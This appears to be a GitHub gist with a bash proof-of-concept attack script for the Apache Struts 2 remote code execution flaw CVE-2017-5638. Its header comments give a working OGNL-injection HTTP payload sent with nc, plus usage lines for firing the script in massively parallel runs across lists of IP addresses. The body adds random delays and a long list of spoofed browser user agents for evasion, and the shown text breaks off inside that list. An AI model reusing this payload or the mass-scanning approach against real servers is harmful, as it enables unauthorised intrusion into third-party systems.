Last active
April 20, 2018 09:11
-
-
Save f0r34chb3t4/71c83b5583319ab750406a2f708dfc48 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Poc | |
| # by f0r34chb3t4 - Qui Abr 12 21:00:24 -03 2018 | |
| # | |
| # CVE-2017-5638 | |
| # Apache Struts 2 Vulnerability Remote Code Execution | |
| # | |
| # chmod a+x CVE-2017-5638-poc.sh | |
| # | |
| # ./CVE-2017-5638-poc2.sh 192.168.9.3 | |
| # | |
| # sort -u urls.txt | sort -R | xargs -P64 -l -I{} ./CVE-2017-5638-poc2.sh '{}' | |
| # sort -R Apache.ipsA | xargs -P2222 -l timeout 10 ./CVE-2017-5638-poc2.sh | |
| # export payload="POST /doUpload.action HTTP/1.1\r\nHost: localhost:8080\r\nContent-Length: 279000000\r\nCache-Control: max-age=0\r\nOrigin: http://localhost:8080\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nReferer: http://localhost:8080/doUpload\r\nAccept-Language: en-US,en;q=0.8,es;q=0.6\r\nConnection: close\r\n\r\n------WebKitFormBoundaryXd004BVJN9pBYBL2\r\nContent-Disposition: form-data; name=\"upload\"; filename=\"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}\"\r\nContent-Type: text/plain\r\n\r\nfoo\r\n------WebKitFormBoundaryXd004BVJN9pBYBL2--\r\n" | |
| # echo -e "$payload" | nc localhost 8080 | |
| # sudo tcpflow -cpi ens33 port 80 | |
| readonly IPv4="$1" | |
| readonly PORT=${2:-80} | |
| [ -z "${IPv4}" ] && exit 1 | |
| [ -z "${PORT}" ] && exit 1 | |
| sleep .$[ ( $RANDOM % 4 ) + 1 ]s | |
| ################################################################################ | |
| # user agent list | |
| ################################################################################ | |
| read -d '\n' -r USER_AGENT_LIST <<-'TXT' | |
| Apache-HttpClient/4.3.1 (java 1.5) | |
| facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php) | |
| facebookexternalhit/1.1 | |
| Microsoft Office Mobile /14.0 | |
| Microsoft Office Mobile/15.0 | |
| Mozilla/5.0 (Android 5.0.2; Mobile; rv:50.0) Gecko/50.0 Firefox/50.0 | |
| Mozilla/5.0 (Android 6.0; Mobile; rv:50.0) Gecko/50.0 Firefox/50.0 | |
| Mozilla/5.0 (Android 6.0; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 | |
| Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 710) | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B100 Safari/602.1 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_6 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B651 Safari/9537.53 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 8_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12D508 Safari/600.1.4 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G34 Safari/601.1 | |
| Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1 | |
| Mozilla/5.0 (Linux; Android 4.0.4; GT-S7560M Build/IMM76I) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31 | |
| Mozilla/5.0 (Linux; Android 4.1.1; C1604 Build/11.3.A.3.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; GT-I8190L Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; GT-I8262B Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; GT-I8262B Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; GT-I8552B Build/JZO54K) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19 | |
| Mozilla/5.0 (Linux; Android 4.1.2; GT-I8552B Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.68 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; GT-I8552B Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; GT-I8552B Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; GT-I9082L Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; GT-S6293T Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; GT-S6313T Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; GT-S6313T Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; LG-E425f Build/JZO54K) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19 | |
| Mozilla/5.0 (Linux; Android 4.1.2; LG-E425f Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; LG-E467f Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; LG-E470f Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; LG-E470f Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; LG-E475f Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; LG-P714 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; LG-P716 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; XT918 Build/2_330_2009) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.1.2; Y340-U081 Build/HuaweiY340-U081) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko; googleweblight) Chrome/38.0.1025.166 Mobile Safari/535.19 | |
| Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONE TOUCH 5037E Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONE TOUCH 7040A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONE TOUCH 7047E Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.2; C2304 Build/16.0.B.2.16) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.2; GT-I8200L Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.2; GT-I9063T Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.2; GT-S7273T Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.2; GT-S7273T Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.2; GT-S7582L Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.68 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.2; GT-S7582L Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.2; GT-S7582L Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.2.2; pt-br; SAMSUNG GT-S7273T Build/JDQ39) AppleWebKit/535.19 (KHTML, like Gecko) Version/1.0 Chrome/18.0.1025.308 Mobile Safari/535.19 | |
| Mozilla/5.0 (Linux; Android 4.3; C2004 Build/15.5.A.1.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.136 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.3; SM-G3502T Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.3; SM-G7102T Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.3; XT1033 Build/14.10.0Q3.X-76-LCG-9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; ASUS_T00J Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; ASUS_Z002 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; D2114 Build/20.1.B.2.30) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.109 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; D2114 Build/20.1.B.2.30) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; G4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; GT-I9192 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; GT-N7100 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; GT-S5310C Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; LG-D175f Build/KOT49I.A1441096475) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; LG-D295 Build/KOT49I.A1440634080) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; LG-D385 Build/KOT49I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; LG-D410 Build/KOT49I.A1411711736) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; LG-D805 Build/KOT49I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; LG-H222 Build/KOT49I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.109 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; pt-br; SAMSUNG GT-I9192 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; S440 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; S550 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; SM-G110B Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; SM-G110B Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; SM-G355M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.109 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; SM-G355M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; SM-G355M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.2; XT918 Build/3_19A_2009) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.3; D5322 Build/19.1.1.C.0.56) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 [FB_IAB/MESSENGER;FBAV/102.0.0.10.68;] | |
| Mozilla/5.0 (Linux; Android 4.4.3; XT1033 Build/KXB21.14-L1.32) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; D2212 Build/18.5.B.0.26) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; D2212 Build/18.5.B.0.26) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; SAMSUNG SM-G318ML Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; SM-G130BU Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; SM-G316ML Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; SM-G318ML Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; SM-G530BT Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Mobile Safari/537.36 OPR/37.0.2192.105088 | |
| Mozilla/5.0 (Linux; Android 4.4.4; SM-G530BT Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; SM-G530H Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; XT1021 Build/KXC21.5-40) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; XT1022 Build/KXC21.5-40) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; XT1025 Build/KXC21.5-40) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; XT1025 Build/KXC21.5-40) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; XT1033 Build/KXB21.14-L1.40) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; XT1033 Build/KXB21.14-L1.40) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; XT1039 Build/KXB21.14-L1.56-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 4.4.4; XT1068 Build/KXB21.85-24) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.1; GT-I9500 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.1; GT-I9515L Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.1; GT-I9515L Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.1; LG-H326 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.1; LG-H340 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.1; LG-H502 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; 6039J Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; ASUS_Z00UD Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; LG-D227 Build/KOT49I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.109 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; LG-D337 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; LG-D337 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; LG-D410 Build/LRX22G.A1440649755) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; LG-D690n Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; LG-H540 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; MotoE2 Build/LXC22.99-13.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; S455 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-A300M Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-G360BT Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-G360M Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-G530BT Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-G530H Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SM-A300M Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SM-A700FD Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SM-G360BT Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SM-G360BT Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.68 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SM-G360BT Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SM-G360BT Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; SM-G530BT Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; XT1068 Build/LXB22.46-28) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; XT1068 Build/LXB22.99-16.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; XT1069 Build/LXB22.99-16.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; XT1078 Build/LXB22.99-24.12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0.2; XT1078 Build/LXB22.99-24.7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0; ASUS_T00J Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0; E2306 Build/26.1.A.3.111) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0; E2363 Build/26.1.B.3.109) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.0; E2363 Build/26.1.B.3.109) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; D5322 Build/19.4.A.0.182) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; D6633 Build/23.4.A.1.232) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; Lenovo-A6020l36 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; LG-K130 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 | |
| Mozilla/5.0 (Linux; Android 5.1.1; LG-K130 Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 | |
